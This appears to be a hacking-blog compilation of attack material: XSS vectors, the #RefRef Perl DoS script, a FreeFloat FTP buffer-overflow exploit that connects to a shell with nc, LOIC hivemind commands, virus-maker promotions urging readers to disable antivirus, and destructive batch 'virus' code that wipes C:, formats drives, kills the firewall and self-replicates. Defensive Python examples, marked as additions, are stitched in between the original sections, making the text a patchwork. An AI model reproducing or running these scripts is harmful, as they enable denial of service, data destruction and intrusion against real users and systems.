(IMG SRC="javascript:alert('XSS');")

No quotes and no semicolon:

(IMG SRC=javascript:alert('XSS'))

Case insensitive XSS attack vector:

(IMG SRC=JaVaScRiPt:alert('XSS'))

Malformed IMG tags. This XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. This would make it significantly more difficult to correctly parse apart an HTML tag:

(IMG """)(SCRIPT)alert("XSS")(/SCRIPT)")

Extraneous open brackets. The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

((SCRIPT)alert("XSS");//((/SCRIPT)

XSS with no single quotes or double quotes or semicolons:

(SCRIPT)a=/XSS/
alert(a.source)(/SCRIPT)

End title tag. This is a simple XSS vector that closes

(/TITLE)(SCRIPT)alert("XSS");(/SCRIPT)

Remote Style Sheet (using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. NOTE: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

(LINK REL="stylesheet" HREF="http://victim.org/xss.css")

Remote Style Sheet 2 (the same as above but uses a (STYLE) tag instead of a (LINK) tag). You can remove the end (/STYLE) tag if there is HTML immediately after the vector to close it:

(STYLE)@import'http://victim.org/xss.css';(/STYLE)
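Why a filter that looks for known-bad strings does not stop the vectors listed above, while encoding the reflected value does, shown as an added example that is not part of the original post. The blacklist filter, the function names and the cookie value are constructed for illustration; the vectors are the page's own with () changed to <>.

```python
import html
import re
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Vectors from the list above, with () changed to <> as the NOTE describes.
VECTORS = [
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
    "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
    "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>",
]

TAG_START = re.compile(r"</?[a-z]", re.IGNORECASE)


def naive_blacklist(value):
    """Hypothetical weak filter: strips two known-bad lowercase strings."""
    return value.replace("<script>", "").replace("javascript:", "")


def encode_for_html(value):
    """Output encoding: <, >, &, " and ' become character references."""
    return html.escape(value, quote=True)


def contains_markup(rendered):
    """True if the output still holds something a browser would parse as a tag."""
    return bool(TAG_START.search(rendered))


def audit(vectors):
    """For each vector: (survives the blacklist, survives output encoding)."""
    return [(contains_markup(naive_blacklist(v)),
             contains_markup(encode_for_html(v))) for v in vectors]


def render_vulnerable(query):
    """Reflects the parameter verbatim: the flaw in the non-persistent scenario."""
    return "<p>Results for: " + query + "</p>"


def render_hardened(query):
    """Same page with the reflected value encoded for the HTML context."""
    return "<p>Results for: " + encode_for_html(query) + "</p>"


def safe_url(value):
    """Allowlist for src/href values: absolute http(s) only, any letter case."""
    cleaned = "".join(ch for ch in value if ch > " ")  # drop whitespace/control chars
    if urlsplit(cleaned).scheme.lower() in ("http", "https"):
        return cleaned  # still has to be encoded when written into the attribute
    return None


def session_cookie_header(session_id):
    """Session cookie that page script cannot read (HttpOnly), sent over TLS only."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    for vector, (blacklist, encoded) in zip(VECTORS, audit(VECTORS)):
        print(f"{vector!r}: after blacklist={blacklist}, after encoding={encoded}")
    print(session_cookie_header("constructed-session-id"))
```

Every vector still contains live markup after the blacklist and none does after encoding; the HttpOnly flag limits what a script that does get through can take from the session.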

Browser Crusher , arrrrrrr Or Denial of Service - DoS - Vulnerability

A Denial of Service Attack (DoS Attack) or Distributed Denial of Service Attack (DDoS Attack) is an attempt to make a computer resource unavailable to its intended users. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

======================================================================


Firefox 3.6.3 window.print() DoS version 2

Tested on: Firefox 3.6.3 on OSX 10.6.3 and Safari 4.0.5 on OSX 10.6.3

Credits:

Asheesh kumar Mani Tripathi

NOTE: Opening the HTML page in your browser will execute a DoS attack on your own system!

=======================================================================


0day Mozilla Firefox 3.6.12 Remote Denial of Service

Tested on: Firefox 3.6.12

Credits:

Emanuele 'emgent' Gentili

Alessandro 'scox' Scoscia

NOTE: Opening the HTML page in your browser will execute a DoS attack on your own system!

=======================================================================


All browsers 0day Crash Exploit

Tested on: Mozilla Firefox - Internet Explorer - Google Chrome - Netscape - Opera

Credits:

Inj3ct0r Team

NOTE: Opening the HTML page in your browser will execute a DoS attack on your own system!

=======================================================================


All Browsers - Long Unicode DoS PoC

Tested on: All browsers

Credits:

Dr_IDE

NOTE: Opening the HTML page in your browser will execute a DoS attack on your own system!

=======================================================================


Google Chrome v8.0.552.237 address overflow DoS

Tested on: Windows XP - SP2 (EN) - Windows 7 x64

Credits:

Vuk Ivanovic, whysoserious

NOTE: Opening the HTML page in your browser will execute a DoS attack on your own system!

=======================================================================



IE6 / 7 Remote Dos vulnerability

Tested on: Windows XP SP3

Credits:

Richard Leahy, why so serious, hans J3ct0r

NOTE: Opening the HTML page in your browser will execute a DoS attack on your own system!


Stay tuned, there will be more. I'm sorry that I can't upload it; it crashes my browser and my system.
I will try again.

#RefRef - Denial of Service (DDoS) tool developed by Anonymous released




#RefRef

#RefRef was programmed in:

- Perl

- Python

- JavaScript


Second Attack to test the application - #RefRef executed in Perl - Anonymous



#RefRef programmed in Perl:

#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?

Download #RefRef here

FreeFloat FTP Server ACCL Buffer Overflow Exploit

#!/usr/bin/python

#

#[+]Exploit Title: FreeFloat FTP Server ACCL Buffer Overflow Exploit

#[+]Date: 01\0602\2012

#[+]Author: mortis

#[+]Software Link: here


#[+]Version: 1.00

#[+]Tested On: Windows XP SP3 English

#[+]CVE: N/A

#


from socket import *

import sys, struct, os


def sploit(host, port):

      #open listener shell on port 4444




      padding = "A"*246

      sled = "\x90"*20

      jmpesp = struct.pack('

      sploit = padding + jmpesp + sled + sc

      s = socket(AF_INET,SOCK_STREAM)

      s.connect((host,port))

      s.recv(1024)

      s.send("USER test\r\n")

      s.recv(1024)

      s.send("PASS test\r\n")

      s.recv(1024)

      s.send("ACCL "+sploit+"\r\n")

      s.close()


if __name__ == '__main__':

      if (len(sys.argv) < 3):

         print "\nUsage: freefloat.py \n"

         sys.exit()

      else:

         host = sys.argv[1]

         port = sys.argv[2]

         sploit(host, int(port))

         os.system("nc " + host + " 4444")

Email and SMS Bombs

An Email Bomb is a form of net abuse consisting of sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted in a Denial of Service Attack.


Email bombing

Email bombing is characterized by abusers repeatedly sending an email message to a particular address at a specific victim site. In many instances, the messages will be large and constructed from meaningless data in an effort to consume additional system and network resources. Multiple accounts at the target site may be abused increasing the denial of service impact.


Zip bombing

A ZIP Bomb is a variant of mail-bombing. It appeared after most commercial mail servers began checking mail with anti-virus software and filtering certain malicious file types (EXE, RAR, Zip or 7-Zip); mail server software was then configured to unpack archives and check their contents as well. A new idea to defeat this check was composing a "bomb" consisting of an enormous text file, containing, for example, only the letter z repeating millions of times. Such a file compresses into a relatively small archive, but its unpacking (especially by early versions of mail servers) would use a greater amount of processing, which could result in a DoS (Denial of Service).
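How a mail scanner can refuse such an archive before it spends the resources, as an added example that is not part of the original post: it checks the sizes declared in the ZIP central directory and then unpacks under a hard byte budget. The limits, function names and both sample archives are assumptions constructed for the demonstration.

```python
import hashlib
import io
import zipfile

# Assumed site policy, not values from the page.
MAX_UNPACKED_BYTES = 50 * 1024 * 1024
MAX_RATIO = 100
MAX_MEMBERS = 1000


class ArchiveRejected(Exception):
    """Raised when an archive exceeds the unpacking policy."""


def check_declared_sizes(zf, max_unpacked, max_ratio, max_members):
    """Read only the central directory: no member data is decompressed here."""
    infos = zf.infolist()
    if len(infos) > max_members:
        raise ArchiveRejected(f"too many members: {len(infos)}")
    unpacked = sum(i.file_size for i in infos)
    packed = max(sum(i.compress_size for i in infos), 1)
    if unpacked > max_unpacked:
        raise ArchiveRejected(f"declared size {unpacked} exceeds {max_unpacked}")
    if unpacked / packed > max_ratio:
        raise ArchiveRejected(
            f"compression ratio {unpacked // packed}:1 exceeds {max_ratio}:1")
    return infos


def read_capped(zf, info, budget):
    """Decompress one member in chunks, aborting once the byte budget is spent."""
    chunks, used = [], 0
    with zf.open(info) as member:
        while True:
            chunk = member.read(64 * 1024)
            if not chunk:
                return b"".join(chunks)
            used += len(chunk)
            if used > budget:
                raise ArchiveRejected(f"{info.filename} exceeded unpack budget")
            chunks.append(chunk)


def scan_attachment(data, max_unpacked=MAX_UNPACKED_BYTES,
                    max_ratio=MAX_RATIO, max_members=MAX_MEMBERS):
    """Return (accepted, reason); a content scanner would inspect each member read."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            budget = max_unpacked
            for info in check_declared_sizes(zf, max_unpacked, max_ratio, max_members):
                budget -= len(read_capped(zf, info, budget))
    except (ArchiveRejected, zipfile.BadZipFile) as exc:
        return False, str(exc)
    return True, f"{max_unpacked - budget} bytes unpacked"


def build_zip(payload, name="attachment.txt"):
    """Build a constructed single-member ZIP in memory for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


# Constructed inputs: 5 million "z" bytes (the page's example) and 2 KiB of
# incompressible bytes standing in for an ordinary attachment.
REPETITIVE = build_zip(b"z" * 5_000_000)
ORDINARY = build_zip(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64)))

if __name__ == "__main__":
    print(len(REPETITIVE), scan_attachment(REPETITIVE))
    print(len(ORDINARY), scan_attachment(ORDINARY))
```

The repetitive archive is only a few kilobytes on the wire and is rejected on its ratio alone, without decompressing any of it.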


Mass mailing

Mass mailing consists of sending numerous duplicate mails to the same email address. These types of mail bombs are simple to design but their extreme simplicity means they can be easily detected by spam filters. Email Bombing using mass mailing is also commonly performed as a DDoS Attack by employing the use of zombie botnets: hierarchical networks of computers compromised by malware and under the attacker's control. Similar to their use in spamming, the attacker instructs the botnet to send out millions or even billions of emails, but unlike normal botnet spamming, the emails are all addressed to only one or a few addresses the attacker wishes to flood. This form of email bombing is similar in purpose to other DDoS Flooding Attacks. As the targets are frequently the dedicated hosts handling website and email accounts of a business, this type of attack can be just as devastating to both services of the host.

This type of attack is more difficult to defend against than a simple mass-mailing bomb because of the multiple source addresses and the possibility of each zombie computer sending a different message or employing stealth techniques to defeat spam filters.


Technical Issues

- If you provide email services to your user community, your users are vulnerable to email bombing and spamming.

- Email spamming is almost impossible to prevent because a user with a valid email address can spam any other valid email address, newsgroup, or bulletin-board service.

- When large amounts of email are directed to or through a single site, the site may suffer a denial of service through loss of network connectivity, system crashes, or failure of a service because of:

  - overloading network connections

  - using all available system resources

  - filling the disk as a result of multiple postings and resulting syslog entries


Working Email and SMS Bombers

Dank Messenger



You can download Dank Messenger here

======================================================================

SMS Bomber



You can download SMS Bomber here


Prevention

Unfortunately, at this time, there is no way to prevent email bombing or spamming (other than disconnecting from the Internet), and it is impossible to predict the origin of the next attack. It is trivial to obtain access to large mailing lists or information resources that contain large volumes of email addresses that will provide destination email addresses for the spam.

- Develop in-house tools to help you recognize and respond to the email bombing/spamming and so minimize the impact of such activity. The tools should increase the logging capabilities as well as check for and alert you to incoming/outgoing messages that originate from the same user or same site in a very short span of time. Once you identify the activity, you can use other in-house tools to discard the messages from the offending users or sites.

- If your site uses a small number of email servers, you may want to configure your firewall to ensure that SMTP connections from outside your firewall can be made only to your central email hubs and to none of your other systems. Although this will not prevent an attack, it minimizes the number of machines available to an intruder for an SMTP-based attack (whether that attack is an email spam or an attempt to break into a host). It also means that should you wish to control incoming SMTP in a particular way (through filtering or another means), you have only a small number of systems--the main email hub and any backup email hubs--to configure.

- Consider configuring your mail handling system(s) to deliver email into filesystems that have per-user quotas enabled. Doing this can minimize the impact of an email bombing attack by limiting the damage to only the targeted accounts and not the entire system.

- Educate your users to call you about email bombing and spamming.

- Do not propagate the problem by forwarding (or replying to) spammed email.
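A minimal version of the in-house tool described in the first point, as an added example that is not part of the original post: a sliding-window counter that alerts when one sender, or one sending site, delivers too many messages in a short span. The log format, addresses, window and threshold are all constructed assumptions, not any particular mail server's.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format for this example (not a specific MTA's format):
#   <ISO timestamp> from=<sender> to=<recipient>
LOG_LINE = re.compile(r"^(?P<ts>\S+) from=<(?P<sender>[^>]+)> to=<(?P<rcpt>[^>]+)>")


def detect_bursts(lines, window_seconds=60, threshold=5):
    """Alert when one sender, or one sending site, reaches the threshold in the window.

    Returns a list of (kind, source, trigger_time, count) tuples, one per source.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)      # (kind, source) -> timestamps inside the window
    alerted = set()
    alerts = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue                 # ignore lines that are not delivery records
        ts = datetime.strptime(match["ts"], "%Y-%m-%dT%H:%M:%S")
        sender = match["sender"].lower()
        site = sender.rpartition("@")[2]
        for key in (("user", sender), ("site", site)):
            stamps = recent[key]
            stamps.append(ts)
            while ts - stamps[0] > window:
                stamps.popleft()     # slide the window forward
            if len(stamps) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append((key[0], key[1], match["ts"], len(stamps)))
    return alerts


# Constructed sample: normal traffic, one sender flooding a mailbox, and five
# different accounts at one site each sending a single message.
SAMPLE_LOG = (
    ["2012-02-17T09:00:00 from=<alice@corp.example> to=<bob@corp.example>"]
    + [f"2012-02-17T10:00:{s:02d} from=<bomber@flood.example> to=<victim@corp.example>"
       for s in range(6)]
    + [f"2012-02-17T10:05:{5 * i:02d} from=<host{i}@zombie.example> to=<victim@corp.example>"
       for i in range(5)]
    + ["2012-02-17T11:00:00 from=<alice@corp.example> to=<bob@corp.example>"]
)

if __name__ == "__main__":
    for kind, source, when, count in detect_bursts(SAMPLE_LOG):
        print(f"{when} burst from {kind} {source}: {count} messages in window")
```

Counting per site as well as per sender is what catches the third case, where no single account sends more than one message.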

Low Orbit Ion Cannon

Low Orbit Ion Cannon, often abbreviated as LOIC, is an open source network stress testing application, written in C#. A JavaScript version has also been created, enabling a DoS from a web browser. LOIC was initially developed by Praetox Technologies but was later released into the public domain. LOIC is an acronym for Low Orbit Ion Cannon, a fictional weapon in the Command & Conquer series of video games.


Low Orbit Ion Cannon

LOIC performs a Denial of Service (DoS) attack on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.


Countermeasures

Security experts indicated that well-written firewall rules can filter out most traffic from DDoS attacks by LOIC, thus preventing the attacks from being fully effective.


Anonymous

LOIC was utilized by Project Chanology, an offshoot of the Anonymous group, to attack Scientology websites, then by Anonymous itself to successfully attack the Recording Industry Association of America's website in October 2010 and again during Operation Payback in December 2010 to attack the websites of companies and organizations that opposed WikiLeaks. LOIC was utilized by many attackers, despite the fact that a network firewall could easily filter out network traffic it generates, thus rendering it only partly effective.


If an attack is not routed through an anonymization network such as Tor, traceable IP address records can be logged by its recipient. This can be used to identify the individual user conducting DDoS attacks from logs kept by their ISPs. In January 2011 five people were arrested in the UK in connection with the Operation Payback attacks, while in June 2011 a further three LOIC users were arrested in Spain for their involvement in the web attacks. In June 2011 it was reported that Turkish police arrested 32 individuals who allegedly attacked government websites in protest against the introduction of state level web filtering. The individuals are thought to be members of Anonymous that used the LOIC tool in their protest.

Download LOIC v1.1.1.25 here

Download NewEraCracker LOIC 1.1.1.25 here

Download NewEraCracker LOIC 1.1.1.25 (tar) here

How to run on Windows

Get the binaries

Requires Microsoft .NET Framework 3.5 Service Pack 1


How to run on Linux / Mac OSX

Run debug binaries with mono. Read the wiki at https://github.com/NewEraCracker/LOIC/wiki/ for updated instructions


Hivemind/Hidden Mode

Hivemind mode will connect your client to an IRC server so it can be controlled remotely. Think of this as a voluntary botnet. NOTE: It does NOT allow remote administration of your machine, or anything like that; it is literally just control of loic itself.

If you want to start up in Hivemind mode run something like this:

LOIC.exe /hivemind irc.server.address

It will connect to irc://irc.server.address:6667/loic


You can also specify a port and channel:

LOIC.exe /hivemind irc.server.address 1234 #secret

It will connect to irc://irc.server.address:1234/secret


In order to do Hivemind Hidden mode, run something like this:

LOIC.exe /hidden /hivemind irc.server.address

It will connect to irc://irc.server.address:6667/loic without any visible GUI.


Controlling LOIC from PC

As an OP, Admin or owner, set the channel topic or send a message like the following:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true

To start an attack type:

!lazor start

Or just append "start" to the END of the topic:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true start


To reset loic's options back to its defaults:

!lazor default


To stop an attack:

!lazor stop

and be sure to remove "start" from the END of the topic, if it exists, too.
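Because the control channel is plain IRC text in the fixed format shown above, a defender can spot it in captured traffic and read off the target. The following is an added example, not part of the original post or of LOIC: it parses raw IRC lines for `!lazor` commands and replays them to show whether a flood is currently running. The capture, nicknames and server name are constructed; the option names are the ones quoted on this page.

```python
import re

# Raw IRC lines that can carry a hivemind command: a channel message, a topic
# change, or the topic sent to a client on join (numeric 332).
IRC_LINE = re.compile(
    r"^:(?P<source>\S+) (?P<command>PRIVMSG|TOPIC|332) (?:\S+ )?"
    r"(?P<channel>[#&]\S+) :(?P<text>.*)$"
)
# Option names and verbs exactly as they appear in the commands quoted above.
KNOWN_OPTIONS = {"targetip", "message", "port", "method", "wait", "random"}
VERBS = ("start", "stop", "default")


def parse_lazor(text):
    """Split a '!lazor ...' command into its options and its action verb."""
    tokens = text.split()
    if not tokens or tokens[0].lower() != "!lazor":
        return None
    options, action = {}, "configure"
    for token in tokens[1:]:
        key, sep, value = token.partition("=")
        if sep and key.lower() in KNOWN_OPTIONS:
            options[key.lower()] = value
        elif not sep and token.lower() in VERBS:
            action = token.lower()
    return {"action": action, "options": options}


def find_hivemind_commands(irc_lines):
    """Return one finding per IRC line that carries a hivemind command."""
    findings = []
    for number, line in enumerate(irc_lines, start=1):
        match = IRC_LINE.match(line.rstrip("\r\n"))
        parsed = parse_lazor(match["text"]) if match else None
        if parsed is None:
            continue
        findings.append({
            "line": number,
            "issued_by": match["source"].split("!")[0],
            "channel": match["channel"],
            "via": "topic" if match["command"] in ("TOPIC", "332") else "message",
            **parsed,
        })
    return findings


def replay(findings):
    """Per channel: last configured target and whether a flood is running."""
    state = {}
    for finding in findings:
        chan = state.setdefault(
            finding["channel"], {"target": None, "port": None, "active": False})
        if finding["action"] == "default":
            chan.update(target=None, port=None)   # options reset to defaults
        chan["target"] = finding["options"].get("targetip", chan["target"])
        chan["port"] = finding["options"].get("port", chan["port"])
        if finding["action"] in ("start", "stop"):
            chan["active"] = finding["action"] == "start"
    return state


# Constructed capture; the command bodies are the ones shown on this page.
CONFIG = ("!lazor targetip=127.0.0.1 message=test_test port=80 "
          "method=tcp wait=false random=true")
SAMPLE_CAPTURE = [
    ":irc.example.net 332 client1 #loic :" + CONFIG,
    ":op1!op@host.example PRIVMSG #loic :!lazor start",
    ":user2!u@host.example PRIVMSG #loic :is this thing on?",
    ":op1!op@host.example TOPIC #loic :" + CONFIG + " start",
    ":op1!op@host.example PRIVMSG #loic :!lazor stop",
]

if __name__ == "__main__":
    for finding in find_hivemind_commands(SAMPLE_CAPTURE):
        print(finding)
    print(replay(find_hivemind_commands(SAMPLE_CAPTURE)))
```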

Necro Virus Maker




You can change the options to make the virus as you want
to fool your friends and have fun...
But be careful with the files you build
because some of them are really dangerous...

The virus maker is safe!!! Not malware, not adware, not a trojan... Nada...
Safe!
The antivirus will detect it as a virus though, because it's a "bad" program...
Bull***t
Just deactivate it...
And if you still believe that it's a virus then please, DON'T DOWNLOAD IT!!!

Download it here

Shadow Batch Virus Generator

Today is about viruses; there are 2 programs that I want to share.


1 - Shadow Batch Virus Generator
2 - TeraBIT Virus Maker



Here are the things that you are going to do to make a virus:


(1). In Shadow Batch Virus Generator

1. First of all download the virus maker from here




3. You can use various options to make virus to suit your needs. You can:

Infect files of various extensions
Insert virus in startup menu, Kill various processes.
Disable all security services like Windows Defender, Antivirus, Firewall.
Rename file extensions, spread virus via file sharing.
Create new admin account, change user account password.
Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.
5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by most antiviruses.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.

(2) TeraBIT Virus Maker



Download it here

These two virus makers are detected as viruses by most anti-virus software, but they won't harm your PC in any way. Before you run these virus makers disable your anti-virus temporarily.

If you know other virus makers I want to hear your suggestions.

Building a Batch Virus

In DOS, OS/2 and Microsoft Windows a Batch File is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands. Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.

DOS batch files have the filename extension .bat. Batch files for other environments may have different extensions, e.g. .cmd or .bat in the Microsoft Windows NT-family of operating systems and OS/2, or .btm in 4DOS and 4NT related shells. The Windows 9x family of operating systems only recognizes the .bat extension.






Example Commands

Swap mouse buttons:

rundll32 user,swapmousebutton

Open the URL you want:

start http://www.google.com

Shut down the computer and show any message you want:

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f

Disable mouse till next restart:

rundll32 mouse,disable

Disable keyboard till next restart:

rundll32 keyboard,disable

Freezes computer till restart:

rundll32 user,disableoemlayer

=======================================================================


Worm commands:

That command (two lines) will copy itself to any batch file in the directory.

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

Clears other batch file's source and copies itself to it.

%0 >>other.bat

=======================================================================


Trojan Codes:

Writes a list of the files in the same directory into a text document placed in that directory.

dir *.*>>Filelist.txt

Changes specific user account's password to whatever you want.

net user administrator PASSWORD HERE

Creates a text file with ip address information in same directory as batch file.

ipconfig >Computer-IP-address.txt

Copies itself to the AutoRun section of windows.

COPY %0 %windir%WINSTART.BAT

Formats c drive without asking.

format c: /q /autotest

Deletes windows

DELTREE /Y %windir%

Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask permission.

DEL /F /S /Q C:

This is a potential Time-Bomb virus and remember to change the date!

Quote:@echo off
echo. | date | find /c /i "2005.05.10" > NUL
If errorlevel 1 GoTo End
YOUR 'VIRUS' CODE HERE.
:End

The following will turn off the firewall and stop the security center.

Quote:net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS
haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw
uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

This code is also a Time-Bomb

@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo You got owned!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.fbi.gov
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
SharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Serviceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Services
wscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Your computer is destroyed" -f
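The commands in this post are plain text, which makes scripts built from them easy to flag before they run. The following is an added example, not part of the original post: a static scanner that scores a batch file against the behaviours listed above. The weights, the threshold and both sample scripts are assumptions constructed for the demonstration.

```python
import re

# Indicators taken from the commands listed on this page; weights are assumed.
INDICATORS = [
    ("self-copy / persistence", 3, r"\bcopy\s+%0\b"),
    ("self-delete", 2, r"\bdel\s+%0\b"),
    ("stops security service", 3, r'\bnet\s+stop\s+"?(security center|sharedaccess)'),
    ("silent registry import", 2, r"\bregedit\s+/s\b"),
    ("destructive delete/format", 5,
     r"\b(format\s+c:|deltree\s+/y|del\s+/f\s+/s\s+/q\s+c:)"),
    ("input device disable", 2, r"\brundll32\s+(mouse|keyboard),disable"),
    ("account password change", 3, r"\bnet\s+user\s+\S+\s+\S+"),
    ("forced shutdown", 1, r"\bshutdown\s+-s\b.*-f\b"),
    ("date trigger", 1, r"\bdate\b.*\|\s*find\b"),
]
COMPILED = [(label, weight, re.compile(pattern, re.IGNORECASE))
            for label, weight, pattern in INDICATORS]
SUSPICIOUS_SCORE = 5   # assumed threshold for quarantining a script


def scan_batch(text):
    """Score a batch script; returns the score, the (line, label) hits and a verdict."""
    score, hits = 0, []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip().lstrip("@")
        if line.lower().startswith(("rem ", "::")):
            continue                      # comments cannot execute
        for label, weight, regex in COMPILED:
            if regex.search(line):
                score += weight
                hits.append((number, label))
    verdict = "suspicious" if score >= SUSPICIOUS_SCORE else "clean"
    return {"score": score, "hits": hits, "verdict": verdict}


# Constructed samples. The first is assembled from commands quoted on this page.
SUSPICIOUS = """@echo off
rem constructed sample
net stop "Security Center"
net stop SharedAccess
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del %0
"""
BENIGN = """@echo off
rem constructed sample: ordinary backup job
xcopy C:\\Reports D:\\Backup\\Reports /E /Y
echo Backup finished
"""

if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan_batch(sample))
```

A script that stops the security services, imports a registry file silently and then deletes itself scores well above the threshold, while the backup job scores zero.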